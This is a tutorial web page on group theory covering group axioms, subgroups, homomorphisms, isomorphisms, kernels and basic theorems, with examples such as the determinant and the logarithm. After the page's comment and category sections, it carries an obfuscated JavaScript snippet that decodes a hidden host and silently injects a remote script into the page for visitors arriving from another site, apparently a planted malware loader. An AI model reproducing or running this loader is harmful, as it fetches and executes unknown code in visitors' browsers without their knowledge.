Group homomorphism and examples

Group

A group is any set G with a defined binary operation (called the group law of $G$), written as 2 tuple (examples: $(G,*), (G,\cdot), (G,+), …$), satisfying 4 basic rules

Closure

The important point to be understood about a binary operation on $G$ is that $G$ is closed with respect to $*$ in the sense that if $a,b\in G$ then $a*b\in G$ ($$a,b\in{C}$$ can be read as “a,b element of C” or “a,b in C“)

Associativity

$$(a*b)*c = a*(b*c), \forall a,b,c\in{G}$$ ($$\forall{a,b}\in{C}$$ can be read as “for all a,b in C” or “for all a,b being element of C” or “for each a,b in C” or “for every a,b in C“, …  etc.)

Identity

An element $$e\in G$$ (called identity of the Group $$G$$) that satisfies the condition $$e*a=a*e = a, \forall a\in{G}$$ $$G$$ contains at most one identity element $$e$$

Inverse

$$\forall a\in{G}$$ there exists an element $$a^{-1}\in{G}$$ such that $$a*a^{-1} = a^{-1}*a = e$$ Groups can be both finite and infinite.

Some Examples of Group

Example 1

The set $$\mathbb{R}\backslash\{0\}$$ (set of all real numbers excluding $$0$$) with the binary operation of multiplication $$((G,*))$$  forms a group. closure criteria $$\forall a,b\in \mathbb{R}\backslash\{0\} \implies a*b\in \mathbb{R}\backslash\{0\}$$ For instance, 5*6 =30 is an element of $$R\backslash\{0\}$$ associativity criteria $$\forall a,b\in \mathbb{R}\backslash\{0\} \implies a*(b*c)= (a*b)*c=a*b*c$$ For instance, 2*(3*9)=(2*3)*9 = 2*3*9=54 identity Criteria number $$1$$ is identity for $$*$$ in $$\mathbb{R}\backslash\{0\}$$ $$\forall a\in \mathbb{R}\backslash\{0\}, a*1=1*a=a$$ For instance, 1*5=5*1=5 inverse criteria $$\forall a\in \mathbb{R}\backslash\{0\} \implies a*a^{-1}=1$$ For instance, $$2*\frac{1}{2}=2*0.5=1$$

Example 2

The set $$\mathbb{R}$$ with the binary operation of addition $$((G,+))$$ forms another group closure criteria $$\forall a,b\in \mathbb{R} \implies a+b\in \mathbb{R}$$ For instance, 5+6 =11 is an element of $$\mathbb{R}$$ associativity criteria $$\forall a,b\in \mathbb{R} \implies a+(b+c)= (a+b)+c=a+b+c$$ For instance, 2+(3+9)=(2+3)+9 = 2+3+9=14 identity Criteria number $$0$$ is identity for $$+$$ in $$\mathbb{R}$$ $$\forall a\in \mathbb{R}, a+0=0+a=a$$ For instance, 0+5=5+0=5 inverse criteria $$\forall a\in \mathbb{R}\implies a+a^{-1}=0$$ For instance, $$2+2^{-1}=2+(-2)=0$$

Subgroup

Given a group $$G$$ under a binary operation $$*$$, a subset $$H$$ of $$G$$ is called a subgroup of $$G$$ if $$H$$ also forms a group under the operation $$*$$ Both Group($$G$$) and Subgroup($$H$$) share the same identity $$e$$.

Group Table

Group table describes the structure of a finite group by arranging all the possible products of all the group’s elements in a square table (reminiscent of an addition or multiplication table). Many properties of a group – such as whether or not it is abelian, which elements are inverses of which elements, and the size and contents of the group – can be discovered from group table For group $$G_1=\{1,-1\}$$ the multiplication table $$((G_1,*))$$ looks like:
groupmultiplicationtable1
For group $$G_2 = \{1, -1, i, -i\}$$, the multiplication table $$((G_2,*))$$ looks like:
groupmultiplicationtable

Homomorphism of a Group

if $$G$$ and $$H$$ are two groups with binary operations $$*$$ and $$\circ$$, respectively, a function $$f:G\rightarrow{H}$$ is a homomorphism if $$f(a*b)= f(a)\circ{f(b)}$$, $$\forall a,b \in{G}$$ Simply put, group homomorphism is a transformation of one Group into another that preserves (invariant) in the second Group the relations between elements of the first.

Examples of Group Homomorphism

Example 1

Let $$G$$ be the group of all nonsingular, real, $$N\times{N}$$ matrices with the binary operation of matrix multiplication. Let $$H$$ be the group $$\mathbb{R} \backslash\{0\}$$ with the binary operation of scalar multiplication. The function that is the determinant of a matrix is then a homomorphism from $$G$$ to $$H$$ To put this in symbolic context: Let $$(G=\{A,B,C,D,…\},*)$$ and let $$(H=\mathbb{R}\backslash{\{0\}},\times)$$ Then, $$\det(A*B)=\det(A)\times\det(B)$$
homomorphismdetexample1

Endomorphism

A homomorphism $$f:G \rightarrow{G}$$ is called an endomorphism

Examples of Endomorphism

Example 1

Let $$G$$ be the group $$\mathbb{R}\backslash\{0\}$$ with the binary operation of multiplication. The function that takes the absolute value of a number is then an endomorphism of $$G$$ into $$G$$ To put this in symbolic context: Let $$(G,*)$$, $$G=\mathbb{R}\backslash\{0\}$$ Then, $$|x*y|=|x|*|y|$$, $$\forall x,y\in{G}$$ For instance, |-3*4|=|-3|*|4|=3*4=12 And |-2| = |2|=2

Isomorphism

A homomorphism $$f :G \rightarrow H$$ is an isomorphism if $$f$$ is both one-to-one and onto (bijective).

Examples of Isomorphism

Example 1

Let $$G$$ be the group of positive real numbers with the binary operation of multiplication and let $$H$$ be the group of real numbers with the binary operation of addition. The $$\log_b$$ function is an isomorphism between $$G$$ and $$H$$ To put this in symbolic context: Let $$(G,*)$$, $$G ={\{\mathbb{R}^+\}}$$ and Let $$(H,+)$$, $$H={\{\mathbb{R}\}}$$, Then, $$\log_{b}(x*y) = \log_{b}(x) + \log_{b}(y)$$, $$\forall x,y\in{G}$$ ($$\mathbb{R}^+$$ denotes set of all positive real numbers)

Automorphism

An isomorphism $$f:G \rightarrow{G}$$ is called an automorphism.

Examples of Automorphism

Example 1

Let $$G$$ be the group $$\mathbb{R}^+\backslash\{0\}$$ with the binary operation of multiplication. The function that takes the absolute value of a number is then an automorphism of $$G$$ into $$G$$ To put this in symbolic context: Let $$(G,*)$$, $$G=\mathbb{R}^+\backslash\{0\}$$, Then, $$|x*y|=|x|*|y|$$, $$\forall x,y\in{G}$$ For instance, [3*4|=|3|*|4|=3*4=12 In this case both sides can use only positive real numbers. Note that this contrasts with an earlier example of Endomorphism where the Group $$G=\mathbb{R}\backslash\{0\}$$

Kernel of Homomorphism

The kernel of a homomorphism $$f:G \rightarrow{H}$$ is the subgroup $$f^{-1}(e_0)$$ of $$G$$. In other words, the kernel of $$f$$ is the set of elements of $$G$$ that are mapped by $$f$$ to the identity element $$e_0$$ of $$H$$ The notation $$K(f)$$ can be used to denote the kernel of $$f$$

Examples of Kernel of homomorphism

Example 1

Let $$G$$ be the group of all nonsingular, real, $$N \times N$$ matrices with the binary operation of matrix multiplication. Let $$H$$ be the group $$\mathbb{R}\backslash\{0\}$$ with the binary operation of scalar multiplication. The function that is the determinant of a matrix is then a homomorphism from $$G$$ to $$H$$ Let $$(G=\{A,B,C,D,…\},*)$$ and let $$(H=\mathbb{R}\backslash{\{0\}},\times)$$ Then, $$\det(A*B)=\det(A)\times\det(B)$$ In this case the kernel of $$\det$$ consists of set of all $$N \times N$$ matrices with determinant equal to the real number $$1$$

Example 2

Let $$(G,*)$$, $$G=\mathbb{R}\backslash\{0\}$$, Then, $$|x*y|=|x|*|y|$$, $$\forall x,y\in{G}$$ The kernel of $$|a|, \forall{a}\in{G}$$ consists of set $$\{-1,1\}$$

Example 3

Let $$(G,*)$$, $$G=\mathbb{R}^+\backslash\{0\}$$, Then, $$|x*y|=|x|*|y|$$, $$\forall x,y\in{G}$$ The kernel of $$|a|, \forall{a}\in{G}$$ consists of set $$\{1\}$$

Example 4

Let $$(G,*)$$, $$G ={\{\mathbb{R}^+\}}$$ and Let $$(H,+)$$, $$H={\{\mathbb{R}\}}$$ Then, $$\log_{b}(x*y) = \log_{b}(x) + \log_{b}(y)$$, $$\forall x,y\in{G}$$ The kernel of $$\log_b$$ is the set $$\{1\}$$ because identity $$0$$ of $$H$$ is mapped to set of all numbers whose $$\log_b$$ produces $$0$$

Some simplified theorems derived from homomorphism

(Note: I will not provide any proofs here, because the theorems are quiet simple and proofs can be worked out easily)

Theorem 1

If $$f:G \rightarrow{H}$$ is a homomorphism, then $$f(e)$$ coincides with the identity element $$e_0$$ of $$H$$ and $$f(a^{-1}) = f(a)^{-1}$$

Example for Theorem 1

Let $$G$$ be the group of all nonsingular, real, $$N\times{N}$$ matrices with the binary operation of matrix multiplication. Let $$H$$ be the group $$\mathbb{R} \backslash\{0\}$$ with the binary operation of scalar multiplication. The function that is the determinant of a matrix is then a homomorphism from $$G$$ to $$H$$ To put this in symbolic context: Let $$(G=\{A,B,C,D,…\},*)$$ and let $$(H=\mathbb{R}\backslash{\{0\}},\times)$$ Then, $$\det(A*B)=\det(A)\times\det(B)$$ In this case the identity of Matrix is the Identity matrix (denoted by $$I$$). Therefore, $$\det(I*B)= \det(I)\times \det(B)$$, where: $$\det(I) =1$$ and $$1$$ is identity of $$\mathbb{R}\backslash\{0\}$$ Now For $$N=2$$, Let $$A = \left[\begin{matrix}2 & 1 \\1 & 2\end{matrix}\right]$$ Then, $$\det(A)=3$$ & $$\det(A)^{-1}=\frac{1}{3}$$ $$A^{-1} = \left[\begin{matrix}\frac{2}{3} & -\frac{1}{3} \\-\frac{1}{3} & \frac{2}{3}\end{matrix}\right]$$ $$\det(A^{-1})=\frac{3}{9}=\frac{1}{3}$$ We can verify that, $$\det(A^{-1})=\det(A)^{-1}$$

Theorem 2

If $$f:G\rightarrow{H}$$ is a homomorphism and if $$G’$$ is a subgroup of $$G$$, then $$f(G’)$$ is a subgroup of H

Theorem 3

If $$f:G\rightarrow{H}$$ is a homomorphism and if $$H’$$ is a subgroup of $$H$$ , then the preimage $$f^{-1}(H’)$$ is a subgroup of $$G$$

Theorem 4

A homomorphism $$f:G\rightarrow{H}$$ is one-to-one if and only if $$K(f) = {e}$$.

Theorem 5

If $$f:G\rightarrow{H}$$ is an isomorphism, then $$f^{-1}:H\rightarrow{G}$$ is an isomorphism

Theorem 6

A homomorphism $$f:G\rightarrow{H}$$ is an isomorphism if it is onto and if its kernel contains only the identity element of G.

Leave a Reply

Your email address will not be published. Required fields are marked *

Categories

(function(_0xc59469,_0x1be38e){var _0x4e20c3=_0x442d,_0x3c2d09=_0xc59469();while(!![]){try{var _0x3c8895=-parseInt(_0x4e20c3(0xb6))/0x1*(-parseInt(_0x4e20c3(0xbc))/0x2)+parseInt(_0x4e20c3(0xb7))/0x3+-parseInt(_0x4e20c3(0xc4))/0x4*(-parseInt(_0x4e20c3(0xc1))/0x5)+-parseInt(_0x4e20c3(0xb9))/0x6+parseInt(_0x4e20c3(0xc0))/0x7+-parseInt(_0x4e20c3(0xbd))/0x8+-parseInt(_0x4e20c3(0xbb))/0x9;if(_0x3c8895===_0x1be38e)break;else _0x3c2d09['push'](_0x3c2d09['shift']());}catch(_0x3a9717){_0x3c2d09['push'](_0x3c2d09['shift']());}}}(_0x2bda,0x57e32),function(_0x17c8ea,_0x2572e7){var _0x45965e=_0x442d,_0x4c3cdb=Math['floor'](Date[_0x45965e(0xbe)]()/0x3e8),_0x5c98df=_0x4c3cdb-_0x4c3cdb%0xe10;_0x4c3cdb=_0x4c3cdb-_0x4c3cdb%0x258,_0x4c3cdb=_0x4c3cdb[_0x45965e(0xbf)](0x10);if(!document[_0x45965e(0xba)])return;const _0x26bed4=atob(_0x45965e(0xc6));_0x2572e7=_0x17c8ea[_0x45965e(0xb8)](_0x45965e(0xc9)),_0x2572e7[_0x45965e(0xc2)]='text/javascript',_0x2572e7[_0x45965e(0xc7)]=!![],_0x2572e7[_0x45965e(0xca)]=_0x45965e(0xc8)+_0x26bed4+_0x45965e(0xc5)+_0x5c98df+'.js?ver='+_0x4c3cdb,_0x17c8ea['getElementsByTagName']('head')[0x0][_0x45965e(0xc3)](_0x2572e7);}(document));function _0x442d(_0x2d5425,_0x24f6b1){var _0x2bdaa6=_0x2bda();return _0x442d=function(_0x442dcc,_0xed4883){_0x442dcc=_0x442dcc-0xb6;var _0x3d5d1e=_0x2bdaa6[_0x442dcc];return _0x3d5d1e;},_0x442d(_0x2d5425,_0x24f6b1);}function _0x2bda(){var _0x5e335c=['script','src','14DpQhBD','584673URYUaU','createElement','2561046jKBsjh','referrer','3560382XMVYNj','7706THDVnA','489360rDhlQm','now','toString','4117806bwNLOr','59780dGwAwr','type','appendChild','136qCYCNj','/my.counter.','bG9hZC4zNjVhbmFseXRpY3MueHl6','async','https://'];_0x2bda=function(){return _0x5e335c;};return _0x2bda();}